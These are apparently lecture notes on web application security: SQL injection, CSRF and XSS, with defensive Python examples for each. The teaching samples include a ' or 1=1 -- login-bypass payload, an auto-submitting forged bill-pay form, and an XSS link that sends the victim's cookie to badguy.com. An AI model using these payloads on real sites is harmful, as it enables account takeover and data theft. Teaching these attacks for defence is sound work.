Lecture 7 Web Application Security Sunday 10/4/2016
Agenda: Web Site Vulnerabilities
- SQL Injection
- Cross Site Request Forgery (CSRF)
- Cross-site scripting (XSS)
Three Top Web Site Vulnerabilities
- SQL Injection: the browser sends malicious input to the server; bad input checking leads to a malicious SQL query.
- CSRF (Cross-Site Request Forgery): a bad web site makes the browser send a request to a good web site, using the credentials of an innocent victim.
- XSS (Cross-Site Scripting): a bad web site sends an innocent victim a script that steals information from an honest web site.
Three Top Web Site Vulnerabilities: Attack Goals
- SQL Injection: use SQL to change the meaning of a database command.
- CSRF (Cross-Site Request Forgery): leverage the user's session at the victim server to perform actions.
- XSS (Cross-Site Scripting): inject a malicious script into a trusted context.
SQL Injection. Basic picture: the attacker's malicious input is executed on the victim server. (Diagram: 1. the attacker sends malicious input to the victim server; 2. the server issues an unintended SQL query to the victim SQL DB; 3. the attacker receives valuable data.)
SQL Injection: Database queries with PHP. Sample PHP:
    $recipient = $_POST['recipient'];
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executequery($sql);
Problem: what if recipient is a malicious string that changes the meaning of the query?
SQL Injection: CardSystems Attack. CardSystems was a credit card payment processing company; an SQL injection attack in June 2005 put it out of business. The attack:
- 263,000 credit card #s stolen from the database
- credit card #s were stored unencrypted
- 43 million credit card #s exposed
SQL Injection: Case Study
    set ok = execute( "SELECT * FROM Users WHERE user='" & form("user") & "' AND pwd='" & form("pwd") & "'" );
    if not ok.eof
        login success
    else
        fail;
Is this exploitable?
SQL Injection: normal query. The web browser (client) sends the entered username and password to the web server, which runs SELECT * FROM Users WHERE user='me' AND pwd='1234' against the DB.
SQL Injection. Suppose user = ' or 1=1 -- (URL encoded). Then the script does:
    ok = execute( "SELECT * FROM Users WHERE user='' or 1=1 --' AND pwd='...'" );
The -- causes the rest of the line to be ignored, so the effective condition is user='' or 1=1, which is always true. Now ok.eof is false (as long as the Users table is non-empty) and login succeeds. The bad news: easy login to many sites this way.
SQL Injection: How to prevent SQL injection attacks. Examples:
- Parameterized statements: user input is passed to the database as bound arguments rather than embedded in the statement text, so it is treated as data and cannot change the structure of the query.
- Pattern check and sanitize the input: float, integer, Boolean and string parameters can be checked to confirm their value is a valid representation of the given type.
- Input validation: check user input against a set of defined rules for type, length and syntax, and against other business rules.
- Database permissions: the application's database account should have only the permissions it needs (least privilege), so a successful injection can do less damage.
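The case study's login check and its parameterized fix, side by side, as an added example (not code from the lecture; the Users table, the user/password values and the sqlite3 backend are assumptions made for this example). The vulnerable function splices input into the SQL text exactly as the ASP snippet does, so the ' or 1=1 -- payload logs in; the parameterized function binds the same input as an argument and the payload is compared as a plain string.

```python
import sqlite3


def make_db():
    """Constructed sample Users table (an assumption for this example)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    db.execute("INSERT INTO Users VALUES ('me', '1234')")
    db.commit()
    return db


def login_vulnerable(db, user, pwd):
    """Mirrors the lecture's case study: the input is spliced into the SQL
    text, so a value like ' or 1=1 -- rewrites the WHERE clause and the
    -- comment swallows the password check."""
    sql = f"SELECT * FROM Users WHERE user='{user}' AND pwd='{pwd}'"
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, user, pwd):
    """The query text is fixed; user and pwd are bound as arguments and
    compared as plain strings, so quotes and -- in them have no SQL meaning."""
    sql = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return db.execute(sql, (user, pwd)).fetchone() is not None


def person_id_for(db, username):
    """Parameterized form of the lecture's PHP lookup (rowid stands in for
    PersonID in this constructed table)."""
    row = db.execute("SELECT rowid FROM Users WHERE user=?", (username,)).fetchone()
    return None if row is None else row[0]


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"
    print("vulnerable, forged login   :", login_vulnerable(db, payload, "x"))
    print("parameterized, forged login:", login_parameterized(db, payload, "x"))
```

The parameterized version does not need to know what an attack looks like: the database driver never re-parses the bound values as SQL, which is why it holds up against encodings and variations that a filter would miss.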
Cross Site Request Forgery (CSRF): Introduction. What happens in a CSRF attack when a user visits a target website? Q: how long do you stay logged in to Gmail? Facebook? Basic picture: the attacker's site forges a request from the victim's browser to the victim server. (Diagram: user victim, attack server, victim server; the user's browser visits the attack server, which makes the browser send a request, carrying the user's credentials, to the victim server.)
Cross Site Request Forgery: Example. The user logs in to bank.com; the session cookie remains in browser state as the browser is still open. The user then visits another website containing:
    <form name=f action=http://bank.com/billpay.php>
    <input name=recipient value=badguy>
    <script> document.f.submit(); </script>
    </form>
The browser sends the user's authentication cookie with the request, so the transaction will be fulfilled. Problem: cookie authentication is insufficient when side effects occur.
Cross Site Request Forgery: Example (money transfer). (Diagram: a form post to the bank carrying the user's cookie.)
Cross Site Request Forgery: Cookieless example, home router. (Diagram: the user's browser visits a bad web site, which makes the browser send requests to the home router on the local network; no cookie is needed when the browser has saved basic authentication credentials for the router or the router still uses its default password.)
Cross Site Request Forgery: How to prevent CSRF attacks and reduce their threats? Examples of effective solutions:
- Single per-page nonce: insert a nonce into each form and also into a special slot in the server session; compare the two values when the form is submitted.
- Per-session nonce: to overcome the usability weaknesses of the per-page nonce, a single token is created at the beginning of the session and used throughout the session.
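Both defences on the bill-pay example, as an added example (not code from the lecture; the in-memory SESSIONS store, the start_session/render_form/billpay names and the form layout are assumptions made for this example). The token is generated server side, stored in the session and echoed into a hidden field; the attacker's page on another origin cannot read the bank's form, so the forged post arrives without it and is refused, while the browser that was actually shown the form submits it automatically.

```python
import hmac
import re
import secrets

# Hypothetical in-memory session store keyed by session id (an assumption).
SESSIONS = {}


def start_session(user):
    """Log the user in: issue a session id and a per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {
        "user": user,
        "session_token": secrets.token_urlsafe(32),  # per-session nonce
        "page_nonces": set(),                         # unused per-page nonces
    }
    return sid


def render_form(sid, per_page=False):
    """Server-side rendering of bank.com's bill-pay form. The nonce goes into
    the session and into a hidden field. token_urlsafe output is limited to
    [A-Za-z0-9_-], so it needs no HTML escaping here."""
    sess = SESSIONS[sid]
    if per_page:
        nonce = secrets.token_urlsafe(32)
        sess["page_nonces"].add(nonce)
    else:
        nonce = sess["session_token"]
    return (
        '<form method="post" action="/billpay.php">'
        '<input name="recipient">'
        f'<input type="hidden" name="csrf_token" value="{nonce}">'
        "</form>"
    )


def token_from_form(html):
    """What a legitimate browser does: submit the hidden field it was given."""
    m = re.search(r'name="csrf_token" value="([^"]+)"', html)
    return m.group(1) if m else ""


def billpay(sid, form):
    """Handler for billpay.php. The session cookie alone is not enough: the
    submitted token must be an unused per-page nonce of this session or
    equal (constant-time compare) to the session's per-session token."""
    sess = SESSIONS.get(sid)
    if sess is None:
        return "error: not logged in"
    token = form.get("csrf_token", "")
    if token in sess["page_nonces"]:
        sess["page_nonces"].discard(token)  # per-page nonces are single use
    elif not hmac.compare_digest(token, sess["session_token"]):
        return "error: CSRF token missing or invalid"
    return f"paid {form['recipient']} from {sess['user']}"


if __name__ == "__main__":
    sid = start_session("alice")
    print("forged post  :", billpay(sid, {"recipient": "badguy"}))
    tok = token_from_form(render_form(sid))
    print("genuine post :", billpay(sid, {"recipient": "landlord", "csrf_token": tok}))
```

The per-page nonce is stricter (each form can be submitted once, so a leaked token is worthless after use) but breaks the back button and multiple tabs; the per-session token is reusable for the life of the session, which is the usability trade-off the slide refers to.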
Cross Site Request Forgery: For User Protection
- Log out: CSRF attacks generally require that the victim be logged into the target website.
- Do not save basic authentication credentials.
- Change default passwords.
- Use different browsers: most CSRF targets require the victim to have an active session on the website in order for the attack to work.
- Use a virtual machine: use dedicated browser virtual machines (VMs), configured with a minimal OS and a web browser.
- Enforcement via proxies: enforce the use of different browsers for visiting different classes of sites by using proxy servers and configuring the proxy settings on users' browsers.
Cross Site Scripting (XSS). Basic scenario: the attacker's malicious code is executed in the victim's browser. (Diagram: attack server, victim client, victim server.)
Cross Site Scripting (XSS): XSS example, vulnerable website. Search field on victim.com: http://victim.com/search.php?term=apple. Server-side implementation of search.php:
    <HTML>
    <TITLE> Search Results </TITLE>
    <BODY>
    Results for <?php echo $_GET['term'] ?> :
    ...
    </BODY>
    </HTML>
The search term is echoed into the response without any encoding.
Cross Site Scripting (XSS). Consider the link (properly URL encoded):
    http://victim.com/search.php?term=<script>window.open('http://badguy.com?cookie='+document.cookie)</script>
What if the user clicks on this link?
1. The browser goes to victim.com/search.php.
2. victim.com returns <HTML> Results for <script> ... </script>
3. The browser executes the script, which sends the cookie for victim.com to badguy.com.
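The reflected search page above, with and without output encoding, as an added example (not code from the lecture; the PAGE template and the exact attack link are constructed to match the slide). term_from_url decodes the parameter the way $_GET does, search_vulnerable echoes it as search.php does, and search_escaped shows the fix the slide does not spell out: HTML-escaping the term at output, so the browser receives the payload as text rather than as a <script> element.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Template standing in for the lecture's search.php (assumption: same markup).
PAGE = "<HTML><TITLE>Search Results</TITLE><BODY>Results for {term}: ...</BODY></HTML>"

# Constructed attack link, URL-encoded the way it would appear in an email.
PAYLOAD = "<script>window.open('http://badguy.com?cookie=' + document.cookie)</script>"
ATTACK_URL = "http://victim.com/search.php?term=" + quote(PAYLOAD)


def term_from_url(url):
    """Server-side decoding of the term parameter, as PHP's $_GET does."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]


def search_vulnerable(term):
    """echo $_GET['term'] with no encoding: the term lands in the page as markup."""
    return PAGE.format(term=term)


def search_escaped(term):
    """Output encoding: < > & \" ' become entities, so the browser displays the
    term as text and never sees a <script> element."""
    return PAGE.format(term=html.escape(term, quote=True))


def contains_script_element(body):
    """Crude check used only to show the difference between the two responses."""
    return "<script" in body.lower()


if __name__ == "__main__":
    term = term_from_url(ATTACK_URL)
    print(search_vulnerable(term))
    print(search_escaped(term))
```

Escaping must match the context the data is inserted into: html.escape is correct for element content and quoted attribute values, but a term placed inside a <script> block or a URL needs JavaScript or URL encoding instead.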
Cross Site Scripting (XSS). (Diagram: the attack server www.attacker.com hands the victim client the link http://victim.com/search.php?term=<script>...</script>; the victim server www.victim.com answers with <html> Results for <script> window.open(http://attacker.com?... document.cookie...) </script> </html>, which the victim's browser executes.)
Cross Site Scripting (XSS): What is XSS? An XSS vulnerability is present when an attacker can inject scripting code (e.g., JavaScript) into pages generated by a web application. Methods for injecting malicious code:
- Reflected XSS (type 1): the attack script is reflected back to the user as part of a page from the victim site.
- Stored XSS (type 2): the attacker stores the malicious code in a resource managed by the web application, such as a database.
- Others, such as DOM-based attacks (type 0 XSS): malicious data is reflected by the page's own JavaScript code, entirely on the victim's client side.
Cross Site Scripting (XSS). Basic scenario: reflected XSS attack, email version. (Diagram: attack server, user victim, victim server.)
Cross Site Scripting (XSS): 2006 Example Vulnerability. Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website. The injected code redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were then redirected to a phishing site and prompted to enter sensitive financial data.
Cross Site Scripting (XSS): Stored XSS. (Diagram: 1. the attacker injects a malicious script into the victim server, which stores it; 2. the user victim downloads the stored page, script included.)
Cross Site Scripting (XSS): Stored XSS using images. Suppose pic.jpg on the web server contains HTML! A request for http://site.com/pic.jpg results in:
    HTTP/1.1 200 OK
    Content-Type: image/jpeg

    <html> fooled ya </html>
A browser that sniffs content will render this as HTML despite the Content-Type (a server can opt out of sniffing with the X-Content-Type-Options: nosniff response header). Consider photo sharing sites that support image uploads: what if the attacker uploads an image that is really a script?
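A check an upload handler can apply to the scenario above, as an added example (not code from the lecture; the store_upload/serve_image names and the two sample uploads are assumptions made for this example). The file is judged by its own leading bytes, not by its extension or the declared type, and the stored file is served with a fixed Content-Type plus nosniff so a sniffing browser is told not to reinterpret it.

```python
JPEG_MAGIC = b"\xff\xd8\xff"

# Constructed uploads (assumption): a minimal JPEG header, and the lecture's
# HTML-in-a-.jpg payload.
REAL_JPEG = JPEG_MAGIC + b"\xe0" + b"\x00" * 12
FAKE_JPEG = b"<html> fooled ya </html>"


def is_jpeg(data):
    """Check the file's own bytes rather than its name or declared type."""
    return data.startswith(JPEG_MAGIC)


def looks_like_markup(data):
    """Belt and braces: reject anything whose leading bytes a content sniffer
    could take for HTML, even if some other check let it through."""
    head = data[:512].lstrip().lower()
    return any(head.startswith(t) for t in (b"<html", b"<!doctype", b"<script", b"<body"))


def store_upload(data):
    """Upload handler: returns ('ok', data) or ('rejected', reason)."""
    if not is_jpeg(data):
        return "rejected", "not a JPEG"
    if looks_like_markup(data):
        return "rejected", "markup in image"
    return "ok", data


def serve_image(data):
    """Response for a stored image: (status, headers, body). The Content-Type
    is fixed by the server and nosniff tells the browser to trust it."""
    headers = {
        "Content-Type": "image/jpeg",
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, data


if __name__ == "__main__":
    for name, blob in (("real", REAL_JPEG), ("fake", FAKE_JPEG)):
        print(name, store_upload(blob)[0])
```

Serving user uploads from a separate origin (so that even a file that does slip through carries no cookies for the main site) is the usual complement to these checks.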
Cross Site Scripting (XSS): The best way to protect against XSS attacks
- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters).
- Do not attempt to identify active content (i.e., interactive website content) and remove, filter, or sanitize it: there are too many types of active content and too many ways of encoding it to get around filters for such content.
- Adopt a positive security policy that specifies what is allowed. Negative or attack-signature-based policies are difficult to maintain and are likely to be incomplete.
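A positive policy of the kind the slide recommends, applied to query parameters, cookies and headers together, as an added example (not code from the lecture; the RULES table, the parameter names and the request layout are assumptions made for this example). Each value must be a valid representation of its declared type and match an allowed syntax and length; nothing is filtered or "cleaned up", and a parameter the policy does not list is itself an error.

```python
import re

# Constructed allowlist for one request (an assumption for this example):
# every parameter the application accepts, by source, with its type, length
# and syntax. Anything not listed here is rejected; nothing is filtered.
RULES = {
    "query": {
        "term": {"type": "str", "max_len": 64, "pattern": r"[A-Za-z0-9 ]*"},
        "page": {"type": "int", "min": 1, "max": 1000},
    },
    "cookies": {
        "session": {"type": "str", "max_len": 43, "pattern": r"[A-Za-z0-9_-]{22,43}"},
    },
    "headers": {
        "referer": {"type": "str", "max_len": 256,
                    "pattern": r"https://bank\.com(/[A-Za-z0-9_./-]*)?"},
    },
}


def check_one(value, rule):
    """Positive check of a single value: (True, cleaned) if it is a valid
    representation of the declared type and matches the allowed syntax,
    otherwise (False, None). No attempt is made to recognise 'bad' content."""
    if rule["type"] == "int":
        if not re.fullmatch(r"[0-9]{1,9}", value):
            return False, None
        n = int(value)
        if rule["min"] <= n <= rule["max"]:
            return True, n
        return False, None
    if len(value) > rule["max_len"] or not re.fullmatch(rule["pattern"], value):
        return False, None
    return True, value


def validate_request(request, rules=RULES):
    """request is {'query': {...}, 'cookies': {...}, 'headers': {...}} of raw
    strings. Returns (clean, errors); the handler uses only `clean`, and
    only when `errors` is empty. Unknown parameters are errors too."""
    clean, errors = {}, []
    for section, params in request.items():
        section_rules = rules.get(section, {})
        clean[section] = {}
        for name, value in params.items():
            key = name.lower()
            rule = section_rules.get(key)
            if rule is None:
                errors.append(f"{section}.{name}: not an allowed parameter")
                continue
            ok, cleaned = check_one(value, rule)
            if not ok:
                errors.append(f"{section}.{name}: does not match policy")
                continue
            clean[section][key] = cleaned
    return clean, errors


if __name__ == "__main__":
    bad = {"query": {"term": "<script>alert(1)</script>", "page": "2 or 1=1"}}
    print(validate_request(bad)[1])
```

Validation of this kind limits what reaches the application; it does not replace output encoding, since a value that is legitimately allowed (a name containing an apostrophe, say) still has to be escaped for the context it is written into.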
Complex problems in social network sites: user data and user-supplied applications
- Some social networking sites allow users to build and upload their own applications.
- If applications are unrestricted JavaScript that runs in the user's browser, then the JavaScript from an application could read user information, act as the user, or do other malicious actions.